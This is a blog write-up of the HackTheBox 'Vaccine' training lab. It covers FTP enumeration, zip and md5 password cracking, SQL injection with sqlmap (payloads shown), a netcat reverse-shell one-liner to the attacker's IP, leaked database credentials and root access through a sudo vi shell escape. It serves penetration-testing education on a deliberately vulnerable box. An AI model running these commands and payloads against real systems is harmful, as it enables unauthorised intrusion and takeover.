Open in app

Sign in

Write

Sign in

HackTheBox | Vaccine

FarisArch
6 min readOct 29, 2021

If you think October is only the spooky month, well you’re wrong! October is also known as Cyber Security Month!.

To celebrate the month, HackTheBox renewed their Starting-Point which is a path for beginner that want to start hacking to learn. And I must say it is very well made.

HackTheBox! (Literally)

In the path they are 3 tiers., tier 0 ,tier 1 and lastly tier 2. What you’re going to read is a box from Tier 2 called Vaccine.

Vaccine Room rated as Easy.

Enumeration

First step is always enumeration! Enumeration is the key to victory.

NMAP

PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.14.31
|      Logged in as ftpuser
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     syn-ack OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c0:ee:58:07:75:34:b0:0b:91:65:b2:59:56:95:27:a4 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCzC28uKxt9pqJ4fLYmq/X5t7p44L+bUFQIDeEab29kDPnKdFOa9ijB5C5APVxLaAXVYSXATPYUqjIEWU98Vvvol1zuc82+KG9KfX94pD8TaPY2MZnoi9TfSxgwmKpmiRWR4DwwMS+mNo+WBU3sjB2QjgNip2vbiHxMitKeIfDLLFYiLKhc1eBRtooZ6DJzXQOMFp5QhSbZygWqebpFcsrmFnz9QWhx4MekbUnUVPKwCunycLi1pjrsmOAekbGz3/5R3H5tFSck915iqyc8bSkBZgRwW3FDJAXFmFgHG9fX727HsXFk8MXmVRMuH1LxGjvn1q3j27bb22QzprS7t9bJciWfwgt1sl57S0Q+iFbku83NgAFxUG373nspOHn08DwMllCyeLOG3Oy3x9zcCxMGATopiPckt8lb1GCWIvLPSNHMW12OyCKGM+AmLu4q9z7zX1YOUM6oxfn3qZVLKSZJ/DJu+aifv2BVNu/zJU2wdk1vFxysmQ4roj5O5I+H9x0=
|   256 ac:6e:81:18:89:22:d7:a7:41:7d:81:4f:1b:b8:b2:51 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNsSORVFGkIbgItDm/mxmyPhpsIJihXV8y4CQiMTWGdEVQatXNIlXX0yGLZ4JFtPEX9rOGAp/eLZc0mGJtDyuyQ=
|   256 42:5b:c3:21:df:ef:a2:0b:c9:5e:03:42:1d:69:d0:28 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMXvk132UscLPAfaZyZ2Av54rpw9cP31OrloBE9v3SLW
80/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: MegaCorp Login
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
  • Lot’s of information to process don’t worry, take your time! Time is always on our side.
  • Now let’s choose a rabbit hole to go into.

FTP

  • From the NMAP scan, we can see that it says along the line of
Anonymous login is allowed.
  • That means we can login into the File Transfer Protocol (FTP for short) server without valid credentials.
  • When logged in, we can list out the files and directories inside the server.
-rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip
  • A backup file? Let’s get that first and look around for more. If there is not anything, let’s get out of this server!
  • Trying to unzip the file, but it’s password protected! Crap.

John The Ripper

As hackers we always find a way to break something.

  • We can use a utility from John The Ripper (JTR for short) for cracking zip files password called zip2john.
  • Now we need a wordlist to crack it against, we’ll be using the famous rockyou.txt
  • After a while we get a result!

backup.zip:741852963::backup.zip:style.css, index.php:backup.zip

Looks like the password was 741852963

  • Unzipping the file it contains index.php and style.css
  • We’re more interested in the source code of index.php.
  • Looking around the source, we find PHP handling the login function of a site.
<?php
session_start();
  if(isset($_POST['username']) && isset($_POST['password'])) {
    if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
      $_SESSION['login'] = "true";
      header("Location: dashboard.php");
    }
  }
?>

So what’s its doing is if the POST password variable is set, check if the md5 hash of the password matches 2cb42f8734ea607eefed3b70af13bbd3.

  • So there is a login page on this server somewhere.
  • We could try to brute-force the password but that’s not working smart.
  • Since we have the hash of the password it wants, we can crack it to see what the value is
  • We’ll be using crackstation for this and we get it in a second.
admin:qwerty789

Web

  • Visiting the URL, we have a login page for MegaCorp.
  • Let’s use the credentials we found earlier.
  • And we’re able to login.
  • We’re presented with a list of tables of cars and there is a search box.
  • Since it’s fetching the data somewhere, it is possibly fetching from a database?
  • Let’s try a single quote in the search to see what happens.
ERROR: unterminated quoted string at or near "'" LINE 1: Select * from cars where name ilike '%'%' ^

Okay so we have a possible SQL injection in our hands.

Exploit

  • We could do it manually but it’ll take some time so we’ll use a tool made specific for this called Sqlmap.
  • So what I do when dealing with SQL injections is I save the request using Burp Suite which is a Man In The Middle (MITM for short) tool and send to Sqlmap to reduce errors and it’s way easier.
Burp is a tool created by PortSwigger
GET /dashboard.php?search=3 HTTP/1.1
Host: 10.129.142.249
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://10.129.142.249/dashboard.php?search=2
Cookie: PHPSESSID=i8jmu9jjje1t69tjt27ouk1mu7
Upgrade-Insecure-Requests: 1

Now click save item.

  • So now we don’t have to supply any cookies or anything to SQLMAP when performing the request.

$ sqlmap -r ~/sql --batch --os-shell

  • The parameter search is indeed vulnerable to SQL injection. The DBMS in use is PostgresSQL.
Parameter: search (GET)
    Type: boolean-based blind
    Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
    Payload: search=3' AND (SELECT (CASE WHEN (4656=4656) THEN NULL ELSE CAST((CHR(86)||CHR(89)||CHR(99)||CHR(101)) AS NUMERIC) END)) IS NULL-- gQNp

    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: search=3' AND 1330=CAST((CHR(113)||CHR(113)||CHR(113)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (1330=1330) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(120)||CHR(112)||CHR(113)) AS NUMERIC)-- FumX

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: search=3';SELECT PG_SLEEP(5)--

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: search=3' AND 5698=(SELECT 5698 FROM PG_SLEEP(5))-- QKVO

By supplying os-shell, if it’s possible, SQLMAP will give us a shell back

  • And we do get a shell but it’s very unstable.
  • Before performing further, let’s get a better shell through reverse shell.

os-shell> rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.31 9001 >/tmp/f

  • Now we have a better shell on port 9001

Post-Exploit

Now we’re in now what.

  • We are user postgres, we’re in the sudo groups somehow.
  • Try to run sudo but we need a password.
  • Always try with the passwords that we found incase there is any password reuse. But in this case there is not.
  • We do find a private key in .ssh but we don’t have a password to login with.
  • Now when you don’t know what to do, run linpeas. Linpeas is a linux enumeration tool.

Internal Enumeration

  • We have a few interesting findings :
/home/
/home/ftpuser/ftp/backup.zip
/home/simon/.bash_history
/root/
/var/lib/postgresql/.bash_history
/var/lib/postgresql/.psql_history
  • All the .bash_history is empty sadly.
  • Now since we know there is site, let’s check /var/www/html
  • We haven’t check dashboard.php so let’s check the source code of that.
  • We find out how it’s connecting to the database to fetch data.
try {
	  $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
	}

Hard coding credentials in source code isn’t really a great idea

  • Possible credentials :

postgres:P@s5w0rd!

  • Now let’s try sudo -l again.
User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
  • Okay, first thing first let’s SSH into the server first for a more stable shell.

Privilege Escalation

  • Okay, we know that we can run sudo on /bin/vi /etc/postgresql/11/main/pg_hba.conf
  • If you’re unaware, vi is a command line text editor.
  • One thing that people don’t realize is that you can run commands while in vi (cool huh)
  • To do this, first let’s open up the file using sudo

sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf

  • Now we’re in vi mode.
  • Now hit the escape key (ESC), and we get a command bar on the bottom. It’s used for vi keybinds and all that cool stuff.
  • To run commands, first type : and followed by ! now type whatever command you want! I’ll be spawning a root shell.
:!/bin/bash
  • And we should be root now!
Hackthebox
Cybersecurity
Hacking
Tryhackme
Offensive Security

--

--

FarisArch

Written by FarisArch

33 Followers

Cat lover that can blue team.

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams